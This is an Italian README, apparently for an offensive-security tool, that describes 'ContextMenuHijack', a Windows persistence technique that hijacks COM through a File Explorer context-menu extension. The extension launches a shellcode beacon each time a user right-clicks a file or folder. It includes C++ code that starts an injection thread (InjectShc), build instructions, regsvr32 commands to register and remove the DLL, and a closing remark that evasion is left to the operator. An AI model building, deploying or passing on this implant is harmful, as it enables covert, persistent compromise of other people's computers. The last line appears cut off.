
Esegui un payload a ogni clic destro su un file/cartella nel menu di Esplora file per la persistenza
L'idea originale che mi ha ispirato viene da @NinjaParanoid:
ContextMenuHijack è una semplice tecnica di persistenza che utilizza il COM hijacking basato sul comportamento umano: quando fai clic con il tasto destro su un file/cartella in Esplora file per aprire il menu contestuale, esegue allo stesso tempo il beacon che abbiamo specificato.
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
DWORD tid = NULL;
CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);
if (NULL == pDataObj) {
if (pidlFolder != NULL) {
}
return S_OK;
}
return S_OK;
}
Devi solo caricare il file della soluzione (.sln) e compilarlo. È importante sapere che servono privilegi di amministratore per usare questa tecnica di persistenza. Una volta fatto tutto, devi solo registrare il file DLL nel registro con regsvr32:
regsvr32 "C:\path\to\ContextMenuHijack.dll"
se vuoi disinstallarlo, usa semplicemente il flag
/u
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

explorer.exe, sta a te usare le tue tecniche di evasione
